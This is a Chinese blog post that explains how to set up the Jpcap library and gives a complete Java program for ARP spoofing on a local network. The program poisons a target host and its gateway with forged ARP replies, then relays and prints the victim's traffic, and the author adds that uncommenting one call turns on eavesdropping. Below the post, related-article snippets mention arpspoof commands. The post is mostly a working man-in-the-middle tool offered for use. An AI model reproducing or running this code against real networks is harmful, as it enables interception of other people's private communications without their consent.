ARP欺骗在局域网内拦截和窃听他人通讯

最新推荐文章于 2022-07-19 00:42:17 发布
最新推荐文章于 2022-07-19 00:42:17 发布
阅读量1.8k 收藏 3
点赞数
分类专栏: 网络安全

使用jpcap。下载链接为http://pan.baidu.com/s/1jG5wLHs。内含对应的jar和dll。

配置方法:

在windows 64位中(amd 和英特尔均可),下载jpcap安装包。需要提前安装winpcap。

配置Jpcap路径:这一步也是最重要的一步。具体路径为,把Jpcap文件夹下lib文件夹里的Jpcap.dll复制到"C:\Program Files\Java\jre1.6.0_07\bin"文件夹里面(复制到你机器JRE文件夹放到bin文件夹里面就可以了,其中JRE的版本一定要与Eclipse配置的版本一致),再把Jpcap文件夹下lib文件夹里的Jpcap.jar复制到"C:\Program Files\Java\jre1.6.0_07\lib\ext"文件夹里面(复制到你机器JRE文件夹->lib->ext放到ext文件夹里面就可以了)。
      

然后配置EclipseJRE环境,(一定需要),选择Window->preferences->Java->Installed JREs,Installed JREs选择框中选择相应的JRE版本,点Edit,选择Add External JARs…,选择你的Jpcap.jar包("C:\Program Files\Java\jre1.6.0_07\lib\ext"文件夹里),在Finish就配置全部完成了;

在eclipse中代码如下

import java.io.IOException;
import java.net.InetAddress;
import java.net.UnknownHostException;

import jpcap.JpcapCaptor;
import jpcap.JpcapSender;
import jpcap.NetworkInterface;
import jpcap.packet.ARPPacket;
import jpcap.packet.EthernetPacket;
import jpcap.packet.IPPacket;
import jpcap.packet.Packet;
import jpcap.packet.TCPPacket;






public class ChangeARP {
	private NetworkInterface[] devices;
	private NetworkInterface device;
	private JpcapCaptor jpcap;
	private JpcapSender sender;
	private ARPPacket arpTarget,arpGate;
	private byte[] targetMAC,gateMAC;
	private String targetIP,gateIP;
	
	private void getDevice() throws IOException{
		devices = JpcapCaptor.getDeviceList();
		//may not have only one devices
		device = devices[0];
		jpcap = JpcapCaptor.openDevice(device, 2000, false, 10000);
		jpcap.setFilter("ip", true);
		sender = jpcap.getJpcapSenderInstance();		
	}
	
	public ChangeARP(byte[] targetMAC,String targetIP,byte[] gateMAC,String gateIP)
			throws UnknownHostException,InterruptedException{
		//may be buggy
		this.targetMAC = targetMAC;
		this.targetIP = targetIP;
		this.gateMAC = gateMAC;
		this.gateIP = gateIP;
		try{
			getDevice();
		}catch(IOException e){
			
		}
		
		///
		//以下程序用于构建欺骗目标的arp包,使用自己的mac地址,冒充他人ip
		//
		//
		//
		建立ARP包///
		arpTarget = new ARPPacket();
		//以太网类型
		arpTarget.hardtype = ARPPacket.HARDTYPE_ETHER;
		//ip类型
		arpTarget.prototype = ARPPacket.PROTOTYPE_IP;		
		//relay类型
		arpTarget.operation = ARPPacket.ARP_REPLY;
		//mac地址为6个字节
		arpTarget.hlen = 6;
		//ip地址为4个字节
		arpTarget.plen = 4;		
		arpTarget.sender_hardaddr = device.mac_address;
		arpTarget.sender_protoaddr = InetAddress.getByName(gateIP).getAddress();
		arpTarget.target_hardaddr = targetMAC;
		arpTarget.target_protoaddr = InetAddress.getByName(targetIP).getAddress();
		
		//建立以太网包
		EthernetPacket ethToTarget = new EthernetPacket();
		ethToTarget.frametype = EthernetPacket.ETHERTYPE_ARP;
		ethToTarget.src_mac = device.mac_address;
		ethToTarget.dst_mac = targetMAC;
		
		arpTarget.datalink = ethToTarget;
		///
		//以下程序用于构建欺骗网关的arp包
		//
		//
		//
		arpGate = new ARPPacket();
		arpGate.hardtype = ARPPacket.HARDTYPE_ETHER;
		arpGate.prototype = ARPPacket.PROTOTYPE_IP;
		arpGate.operation = ARPPacket.ARP_REPLY;		
		arpGate.hlen = 6;
		arpGate.plen = 4;
		arpGate.sender_hardaddr = device.mac_address;
		arpGate.sender_protoaddr = InetAddress.getByName(targetIP).getAddress();
		arpGate.target_hardaddr = gateMAC;
		arpGate.target_protoaddr = InetAddress.getByName(gateIP).getAddress();
		
		EthernetPacket ethToGate = new EthernetPacket();
		ethToGate.frametype = EthernetPacket.ETHERTYPE_ARP; 
		ethToGate.src_mac = device.mac_address; // A的MAC地址 
		ethToGate.dst_mac = gateMAC; // 网关的MAC地址  
		arpGate.datalink = ethToGate; 

        System.out.println(arpTarget);  
        System.out.println(arpGate);  
        
		///
		//发射线程
		//
		//
		//
        new Thread(new Runnable() {  
        	public void run() {  
        		while (true) {  
        			sender.sendPacket(arpTarget);  
        			sender.sendPacket(arpGate);  
        			System.out.println("hahahahaahah");
                    try {  
                    	Thread.sleep(500);  
                    } catch (InterruptedException e) {  
                    	e.printStackTrace();  
                    }  
        		}  
        	}  
        }).start();  
        //recP();//接收数据并转发
	}
	
	///
	//用于转发数据
	//
	//
	//
	public void recP(){
		IPPacket ipPacket = null;
		while(true){
			ipPacket = (IPPacket)jpcap.getPacket();
			if(ipPacket == null)
				continue;
			
			if(ipPacket.src_ip.getHostAddress().equals(targetIP)){
				System.out.println(ipPacket);
				System.out.println(new String(ipPacket.data));				
			}
			
			if(ipPacket.src_ip.getHostAddress().equals(targetIP)){
				send(ipPacket,gateMAC);
			}else{
				send(ipPacket,targetMAC);
			}						
		}		
	}
	///
	//用于发射
	//
	//
	//
	private void send(Packet packet,byte[] changeMac){
		EthernetPacket eth;
		if(packet.datalink instanceof EthernetPacket){
			eth = (EthernetPacket)packet.datalink;
			for(int i=0;i<6;i++){
				eth.dst_mac[i]=changeMac[i];
				eth.src_mac[i]=device.mac_address[i];
			}
			sender.sendPacket(packet);
		}
		
	}
			
	
	public static void main(String[] args)throws Exception{
		byte[] targetMAC = new byte[6];
        targetMAC[0] = (byte) 0x6c;  
        targetMAC[1] = (byte) 0x62;  
        targetMAC[2] = (byte) 0x6d;  
        targetMAC[3] = (byte) 0x3c;  
        targetMAC[4] = (byte) 0xab;  
        targetMAC[5] = (byte) 0x77; 

		byte[] gateMAC = new byte[6];
        gateMAC[0] = (byte) 0x68;  
        gateMAC[1] = (byte) 0xbd;  
        gateMAC[2] = (byte) 0xab;  
        gateMAC[3] = (byte) 0x33;  
        gateMAC[4] = (byte) 0xff;  
        gateMAC[5] = (byte) 0x80;

		
		
		
		String targetIP = "192.168.48.14";
		String gateIP = "192.168.48.1";
		System.out.println(System.getProperty("java.library.path"));
		ChangeARP temp = new ChangeARP(targetMAC,targetIP,gateMAC,gateIP);		
	}

}
如果要监听对方通信,请将recp前的注释取消掉。



define_us
关注
专栏目录
ARP欺诈Java版基于jpcap和WinPcap来实现
David648210的博客
08-04 786
文章目录前言一、准备工作二、代码1.Attack.java2.ArpUtil.java3.Attacker.java4.AttackList.java5.NetUtil.java6.Ping.java7.Raedcsv.java8.UpdateIp.java三、使用注意总结 前言 看了一位大佬的java版的arp欺诈程序就自己照着写了一个 https://blog.csdn.net/qq_37853750/article/details/100169513?ops_request_misc=%257B%.
Jpcap编写的ARP欺骗小例程
03-03
网络课程作业,ARP欺骗的小程序,利用了JPCAP库,供参考。
使用Arp欺骗与driftnet工具监听局域网信息
qq_33571718的博客
08-16 4569
【重点声明】此系列仅用于工作和学习,禁止用于非法攻击,非法传播。一切遵守《网络安全法》 环境: Ubuntu 16.0.4攻击主机:192.168.1.130,Windows10 目标机:192.168.1.219 扫描该网段存活的主机: nmap -sP 192.168.1.1/24 测试前,可以先看一下两台机器网络是否相同,是否可以连通外网;如图: 1.ARP欺骗: ...
内网IP拦截
罗格的博客
05-31 427
package com.xmeport.project.config; import com.xmeport.framework.filter.XssFilter; import com.xmeport.project.interceptor.GetEntApiInterceptor; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.boot.web.servlet.Fil.
JPCAP——JAVA中的数据链路层控制(监听原理) ARP欺骗
mauersu
04-05 293
源:http://hi.baidu.com/leifenglian/item/763e551248b3e2453a176e8a 评: 监听原理   在详细说用JPCAP实现网络监听实现前,先简单介绍下监听的原理。  局域网监听利用的是所谓的 “ARP欺骗”技术。在以前曾经一段阶段,局域网的布局是使用总线式(或集线式)结构,要到达监听只需要将网卡设定为混杂模式即可,但现在的局域网络普遍 采用的...
使用JPCAP实现ARP欺骗
蓬莱道人的博客
10-15 1474
1、JPCAP简介      众所周知,JAVA语言虽然在TCP/UDP传输方面给予了良好的定义,但对于网络层以下的控制,却是无能为力的。JPCAP扩展包弥补了这一点。JPCAP实际上并非一个真正去实现对数据链路层的控制,而是一个中间件,JPCAP调用wincap/libpcap,而给JAVA语言提供一个公共的接口,从而实现了平台无关性。在官方网站上声明,JPCAP支持FreeBSD
局域网内如何防止ARP欺骗.pdf
11-06
局域网内的ARP欺骗是一种常见的网络安全威胁,它利用了ARP(Address Resolution Protocol)协议的漏洞,使得攻击者能够在网络中冒充其他设备,导致数据包被拦截或篡改。ARP欺骗通常发生在共享式网络环境中,如使用...
局域网ARP欺骗实战:MitM攻击与防护策略
# 1. ARP欺骗攻击简介 ## 1.1 ARP协议基础概念 在局域网中,为了实现数据包的传输,每台设备都需要有一个唯一的MAC地址。...ARP欺骗攻击利用ARP协议的工作机制进行攻击,攻击者向局域网内的目标主机发送伪装的ARP响
局域网下的arp攻击c程序
01-19
**ARP缓存中毒(ARP Cache Poisoning)**:这是ARP欺骗的一种,攻击者不断发送伪造的ARP响应,更新目标主机和网关的ARP缓存表,使得目标主机的数据包被误发到攻击者而非真正的网关,从而导致网络通信中断或被窃听。...
AntiARPSniffer局域网内防arp攻击的.rar
10-22
该软件能够监控局域网内的ARP流量,检测并阻止非法的ARP请求和响应,防止 ARP 欺骗的发生。其主要功能包括: 1. 实时监测:AntiARPSniffer可以实时监控网络中的ARP请求和响应,及时发现异常行为。 2. 防护机制:当...
ARP 欺骗导致的中间人攻击解析
ARP 欺骗是指攻击者发送虚假的ARP 响应数据包,使得本应该被发送给目标设备的数据包被发送到攻击者指定的设备上,从而实现对网络通信的窃听、篡改甚至拒绝服务。 ## B. 中间人攻击的定义 中间人攻击(Man-in-the-...
ARP监听 ARP欺骗
06-20
ARP 监听 欺骗 ARP监听 ARP欺骗 以太网的ARP监听 以太网的ARP欺骗 Ethernet arp监听 Ethernet arp欺骗 ARP 监听 欺骗 ARP监听 ARP欺骗 以太网的ARP监听 以太网的ARP欺骗 Ethernet arp监听 Ethernet arp欺骗
利用ARP欺骗另一台电脑并偷窥
weixin_34050389的博客
09-21 211
实验目的:欺骗别人的电脑和偷窥别人的屏幕实验仪器:一台pc机,VMware虚拟机实验步骤:1首先开启虚拟机,设置虚拟机里的IP,子网掩码,网管2打开terminal,输入如下指令arpspoof -i eth0 -t 172.28.15.20 172.28.15.254(欺骗172.28.15.20,告诉他我就是网关172.28.15.254)使其不能上网echo 1 &gt...
arp欺骗
jiangbianxiumu的专栏
08-01 484
arp是什么?中文名:地址解析协议。我们知道在局域网中网络数据包得发送不是根据ip进行传输,而是根据mac地址。当某一个主机A准备发送一个数据包时,首先他会发送一个广播,告诉周围的计算机我将要发送一个ip是**.**.**.**的数据包,如果哪一台主机的网卡是这个ip地址,请立即告诉我你的mac地址。这个询问的过程就是一个arp请求,而回答这个请求的主机发出去的数据包就是一个arp应答。  
计算机通信过程详解 与 arp欺骗
weixin_42109053的博客
07-19 725
一、计算机通信过程 1.1 如下图,是数据的封装层次结构。 在网络层,数据的首部会添加IP地址,组合后的数据格式称为数据报。 在链路层,数据报的首部会添加 mac地址,组合后的数据格式称为数据帧。 1.2 如下图,是两台计算机通信的过程。 数据段、源IP和目标IP确定之后,接下来是确定源和目标MAC地址。 过程1:在该网段内,目标IP与源IP不是同一网段,所以该数据帧会发送给路由器,由路由器负责转发。 此时目标MAC地址应该指明交换机将数据帧发送给路由器,所以目标MAC 地址是M2地址。 过程2:在该网段
网络安全实战(一)ARP欺骗
weixin_42474227的博客
12-30 4288
网络安全实战(一)ARP欺骗
c# SharpPcap 截包,抓包 - 资料收集贴 --转
weixin_30275415的博客
11-05 382
Form开发碰到问题,想的办法都无法满足要求,必须实现抓包软件实现的功能。。通过get返回的文字来判断。。以前没搞过。慢慢来。。。 ==== 2010.09.25 ===== 发现一个怪问题。用无线网卡调试程序 //获取网络设备 var devices = LivePcapDeviceList.Instance; 运行...
ARP攻击与欺骗
kaminao的博客
12-03 666
ARP攻击与欺骗ARP攻击和ARP欺骗的原理ARP攻击应用案例三级目录 ARP攻击和ARP欺骗的原理 1.ARP攻击的原理 一般情况下,ARP攻击的主要目的是使网络无法通信,它主要包括以下两种行为 1.攻击主机制造假的ARP应答,并发送给局域网中除被攻击主机之外的所有主机;ARP应答中包含被攻击的IP地址和虚假的MAC地址 2.攻击主机制造假的ARP应答,并发送给被攻击主机;ARP应答中包含除被攻击主机之外的所有主机的IP地址和虚假的MAC地址 2.ARP欺骗的原理 一般情况下,ARP欺骗并不会使网络无法正
发送数据包和发arp应答包欺骗别人
weixin_33736832的博客
12-28 189
尽管从WinPcap的名字上看,这个库的目标应该是数据捕捉(Packet Capture),然而,它也提供了针对很多其它有用的特性。在其中,我们可以找到一组很完整的用于发送数据包的函数。请注意:原始的libpcap库是不支持发送数据包的,因此,这里展示的函数都属于是WinPcap的扩展,并且它们不能运行于Unix平台下。 使用pcap_sendpacket()发...
局域网ARP欺骗与网页篡改攻击分析
ARP欺骗通常发生在局域网内部,攻击者通过发送虚假的ARP响应消息,将自己伪装成网络中的其他设备,比如网关或者某个特定的主机。这样,当网络中的其他设备试图通信时,它们会误将攻击者的MAC地址当作目标设备的地址...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值